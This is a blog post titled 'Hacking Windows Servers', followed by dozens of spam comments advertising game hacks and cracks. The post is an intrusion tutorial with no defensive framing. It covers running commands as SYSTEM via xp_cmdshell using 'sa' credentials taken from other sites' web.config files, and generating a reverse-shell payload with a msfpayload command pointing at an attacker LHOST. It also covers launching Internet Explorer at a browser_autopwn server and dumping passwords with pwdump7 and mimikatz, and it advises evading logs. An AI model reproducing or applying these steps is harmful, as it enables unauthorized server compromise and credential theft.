Hacking Windows Servers
By:Rafay
Most of us here can hack websites and servers. But what we
hate the most is an error message- Access Denied! We know some methods to
bypass certain restrictions using the symlink, privilege-escalation using local
root exploits and some similar attacks.
But, these get the job done only on Linux servers. What about windows servers?
Here are some ways to bypass certain restrictions on windows
servers or getting SYSTEM privileges.
- Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure.
- Using meterpreter payload to get a reverse shell over the target machine.
- Using browser_autopwn. (Really...)
- Using other tools like pwdump7, mimikatz, etc.
Using the tools is an easy way, but the real fun of hacking lies
in the first three methods I mentioned above.
1. Using xp_cmdshell-
Most of the times on windows servers, we have read
permission over the files of other IIS users, which is needed to make this
method work.
If we are lucky enough, we will find login credentials of
"sa" account of MSSQL server inside web.config file of any website.
You must be wondering why only "sa"?
Here, "sa" stands for Super Administrator and as
the name tells, this user has all possible permissions over the server.
The picture below shows the connection string containing
login credentials of "sa" account.
Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.
So, after getting the "sa" account, we can login
remotely using HeidiSQL
HeidiSQL is an awesome tool to connect to remote database
servers. You can download it here.
After logging into MSSQL server with sa account, we get a
list of databases and their contents.
Now we can execute commands using MSSQL queries via
xp_cmdshell. (With administrator privileges)
Syntax for the query is-
xp_cmdshell '[command]'
For example, if I need to know my current privileges, I
would query-
xp_cmdshell 'whoami'
This shows that I am currently NT Authority/System, which
most of us know is the highest user in the windows user hierarchy.
Now we can go for some post exploitation like enabling RDP,
adding accounts and allowing them to access RDP.
Note: If the server does not have xp_cmdshell stored
procedure, you can install it yourself. There are many tutorials for that online.
2. Meterpreter
Payload-
This method is quite easy and comes useful when we cannot
read files of other users, but we can execute commands.
Using metasploit, generate a reverse shell payload binary.
For example-
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130
LPORT=31337 X > /tmp/1.exe
Now we will upload this executable to the server using our web
backdoor.
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)
Now it's time to execute the payload.
If everything goes right, we will get a meterpreter session
over the target machine as shown below-
We can also use php, asp or other payloads.
3. Browser Autopwn-
This seems odd, as a way of hacking a server. But I myself
found this as a clever way to do the job, especially in scenarios where we are
allowed to execute commands, but we cannot run executables (our payloads) due
to software restriction policies in domain environment.
Most of the windows servers have outdated Internet Explorer
and we can exploit them if we can execute commands.
I think it is clear by now that what I'm trying to explain
;)
We can start Internet Explorer from command line and make it
browse to a specific URL.
Syntax for this-
iexplore.exe [URL]
Where URL would our server address which would be running
browser_autopwn. After that we can use railgun to avoid antivirus detection.
4. Using readily
available tools-
Tools like pwdump and mimikatz can crack passwords of
windows users.
#pwdump7 gives out the NTLM hashes of the users which can be
cracked further using John the Ripper.
The following screenshot shows NTLM hashes from pwdump7:
#mimikatz is another great tool which extracts the plain text
passwords of users from lsass.exe. The tool is some language other than English
so do watch tutorials on how to use it.
Following picture shows plain text passwords from mimikatz:
You can google about them and learn how to use these tools
and what actually they exploit to get the job done for you.
What's up, its good post on the topic of media print, we all be aware of media is a enormous source of information.
ReplyDeleteAlso visit my web-site ... gsa search engine ranker
I read this post completely concerning the comparison of newest and preceding
ReplyDeletetechnologies, it's remarkable article.
my webpage :: Mon Jervois
Hi there! This article couldn't be written much better! Looking at this article reminds me of my previous roommate! He continually kept talking about this. I'll send this
ReplyDeletepost to him. Fairly certain he'll have a great read. Thank you for sharing!
my web site :: World Of Tanks Hack
What a material of un-ambiguity and preserveness of precious familiarity concerning unpredicted
ReplyDeletefeelings.
My web-site :: League Of legends hack
Hello there, You have done an excellent job. I'll certainly digg it and personally suggest to my friends. I am confident they'll be
ReplyDeletebenefited from this website.
Feel free to surf to my homepage :: World of tanks hack
It's amazing to pay a quick visit this web site and reading the views of all colleagues regarding this post, while I am also zealous of getting experience.
ReplyDeletemy site - Install 7Zip
Good way of describing, and good piece of writing
ReplyDeleteto get data regarding my presentation topic, which i am going to convey in institution of higher education.
Look into my weblog ... Minecraft Crack
Wе're a gaggle of volunteers and opening a brand new scheme in our community. Your website provided us with useful information to work on. You've
ReplyDeletedone an impreѕsіve jοb аnԁ
our entire cοmmunity will liκelу be gгateful
to you.
Feel fгee to viѕit my web site world of tаnkѕ cheat **
I am regular visitor, how are you everybody? This paragraph posted
ReplyDeleteat this web site is really good.
My page ... Code Psn Gratuit
I think that what you said was actually very reasonable.
ReplyDeleteHowever, consider this, suppose you were to write a awesome
headline? I am not suggesting your content is not good, however suppose you added something to maybe get a
person's attention? I mean "How to hack Windows Servers" is a little plain. You might peek at Yahoo's home page and watch how they write post
headlines to get viewers to click. You might try adding a video or
a picture or two to get readers interested about what you've got to say. In my opinion, it would bring your blog a little bit more interesting.
Feel free to surf to my page :: Psn Code Generator
What's up friends, how is everything, and what you would like to say concerning this post, in my view its genuinely amazing for me.
ReplyDeleteLook at my weblog: Psn Code Generator
Do you mind if I quote a couple of your posts as long as I provide credit and sources back to your blog?
ReplyDeleteMy blog is in the very same area of interest as yours and my visitors
would really benefit from some of the information you present here.
Please let me know if this okay with you. Regards!
Also visit my web-site; Minecraft Gift Code Generator
I have read several excellent stuff here. Certainly price bookmarking
ReplyDeletefor revisiting. I wonder how a lot attempt you place to create this type of magnificent informative website.
Feel free to visit my site: Minecraft Gift Code Generator
Have you ever considered creating an e-book or guest authoring on other blogs?
ReplyDeleteI have a blog based upon on the same topics you discuss and would really like to have you share
some stories/information. I know my subscribers would appreciate your work.
If you are even remotely interested, feel free to shoot me an e-mail.
Feel free to surf to my page - Minecraft Gift Code Generator
After I originally commented I appear to have clicked on the -Notify me when
ReplyDeletenew comments are added- checkbox and now every time a comment is added I recieve four emails with the exact same comment.
There has to be an easy method you can remove me from that service?
Kudos!
Also visit my web page free microsoft points
I'm extremely inspired along with your writing talents as well as with the layout on your blog. Is this a paid topic or did you modify it your self? Anyway keep up the excellent high quality writing, it is rare to peer a great blog like this one today..
ReplyDeleteMy page - Code Psn Gratuit
What's up everybody, here every person is sharing these kinds of know-how, therefore it's good to read this webpage, and I used
ReplyDeleteto pay a quick visit this website every day.
my homepage; free Microsoft points
I’m not that much of a online reader to be honest but your blogs really nice, keep it up!
ReplyDeleteI'll go ahead and bookmark your site to come back later on. Many thanks
my webpage ... Telecharger minecraft gratuit
What's Happening i'm new to this, I stumbled upon this I have found It absolutely helpful and it has
ReplyDeleteaided me out loads. I hope to give a contribution & help different customers
like its aided me. Great job.
Also visit my web site; Telecharger Minecraft Gratuit
I loved as much as you'll receive carried out right here. The sketch is tasteful, your authored subject matter stylish. nonetheless, you command get bought an shakiness over that you wish be delivering the following. unwell unquestionably come more formerly again since exactly the same nearly a lot often inside case you shield this increase.
ReplyDeleteStop by my blog: Telecharger Minecraft Gratuit
It's remarkable to visit this web page and reading the views of all mates regarding this post, while I am also keen of getting knowledge.
ReplyDeleteMy page - Telecharger Minecraft Gratuit
Hi there Dear, are you actually visiting this web page on a regular basis, if so after that you
ReplyDeletewill absolutely take nice knowledge.
Here is my web blog - Telecharger Minecraft Gratuit
Good post. I learn something new and challenging on blogs I stumbleupon on a daily basis.
ReplyDeleteIt will always be interesting to read through content
from other writers and use a little something from
their web sites.
my web page - ps3 jailbreak 2
Post writing is also a fun, if you be acquainted with then you can write otherwise it is complex to write.
ReplyDeleteFeel free to visit my web site - Ps3 3.56 jailbreak
These are really impressive ideas in on the topic
ReplyDeleteof blogging. You have touched some nice things here. Any way keep up wrinting.
Feel free to surf to my site ... code Psn Gratuit
Hey there! Do you know if they make any plugins to protect
ReplyDeleteagainst hackers? I'm kinda paranoid about losing everything I've worked hard on.
Any recommendations?
Here is my weblog ... Code psn gratuit
If some one desires expert view regarding blogging after that i propose
ReplyDeletehim/her to go to see this weblog, Keep up the good job.
Also visit my webpage brooklyn Bridal Gown
Why viewers still use to read news papers when in this technological globe the whole thing is available on web?
ReplyDeleteAlso visit my blog Dragon City Cheat Engine
Appreciate the recommendation. Let me try it out.
ReplyDeleteMy blog: dragon city hack (youtube.com)
Howdy! I know this is kind of off topic but I was wondering which blog
ReplyDeleteplatform are you using for this website? I'm getting fed up of Wordpress because I've had problems
with hackers and I'm looking at options for another platform. I would be awesome if you could point me in the direction of a good platform.
Feel free to surf to my blog post :: Dragon City Cheat Engine
Hi! Do you know if they make any plugins to protect against hackers?
ReplyDeleteI'm kinda paranoid about losing everything I've worked hard on.
Any recommendations?
My web page :: ps3 jailbreak tutorial
My coder is trying to convince me to move to .net from PHP.
ReplyDeleteI have always disliked the idea because of the expenses.
But he's tryiong none the less. I've been using WordPress
on a number of websites for about a year and am nervous about switching to another
platform. I have heard very good things about blogengine.
net. Is there a way I can transfer all my wordpress content into it?
Any kind of help would be really appreciated!
Feel free to visit my page - Dragon City Cheat Engine
Spot on with this write-up, I seriously think this
ReplyDeleteamazing site needs much more attention. I'll probably be back again to read through more, thanks for the info!
Feel free to visit my site: Dragon City Cheat Engine
Hi! I've been reading your weblog for a long time now and finally got the courage to go ahead and give you a shout out from Kingwood Texas! Just wanted to tell you keep up the good work!
ReplyDeleteMy blog; Dragon City Cheat Engine
Good article. I'm dealing with many of these issues as well..
ReplyDeletemy website ps3 jailbreak
Aw, this was an exceptionally good post. Taking a few minutes and actual effort to generate a
ReplyDeletereally good article… but what can I say… I procrastinate
a whole lot and don't manage to get anything done.
My homepage: ps3 jailbreak :: ::
Hi colleagues, its enormous paragraph on the topic of teachingand entirely explained, keep it up all the time.
ReplyDeleteAlso visit my web-site; Psn Code Generator
When some one searches for his essential thing, thus he/she desires to be available that in
ReplyDeletedetail, thus that thing is maintained over here.
Feel free to surf to my web blog: Hack Facebook Password
Hi there! I could have sworn I've been to your blog before but after looking at some of the articles I realized it's new to me.
ReplyDeleteAnyhow, I'm definitely delighted I came across it and I'll be book-marking it and checking back often!
Check out my web page ... how to get Rid of stretch marks
As the admin of this site is working, no question very rapidly it will
ReplyDeletebe famous, due to its quality contents.
My web blog woodwork ()